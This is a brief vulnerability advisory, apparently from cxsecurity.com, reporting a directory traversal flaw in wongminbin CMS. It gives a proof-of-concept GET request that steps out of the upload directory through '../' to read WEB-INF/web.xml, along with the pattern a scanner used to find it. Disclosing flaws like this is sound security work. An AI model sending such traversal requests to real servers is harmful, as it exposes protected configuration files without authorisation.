wongminbin CMS Directory traversal Vulnerability

Published
Credit
Risk
2016.12.30
Ashiyane Digital Security Team
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title : Directory traversal Vulnerability in wongminbin CMS
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor : https://github.com/wongminbin/CMS
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12 /29 / 2016
|=============================================================|
|[+] Vuln Path : http://127.0.0.1/CMS-master/src/main/webapp/upload/../WEB-INF/web.xml?
|[+] Method :GET
|=============================================================|
|[+] Vulnerability description
|==============================|
|[+] This script is possibly vulnerable to directory traversal attacks.
|[+] Directory Traversal is a vulnerability which allows attackers to access restricted
|[+] directories and execute commands outside of the web server's root directory.
|[+] This vulnerability affects /cms-master/cms/src/main/webapp/upload.
|[+] Discovered by: Scripting (Server_Directory_Traversal.script).
|[+] Attack details
|[+] This file was found using the pattern ${dirName}/../WEB-INF/web.xml?.
|[+] Original directory: /CMS-master/src/main/webapp/upload
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com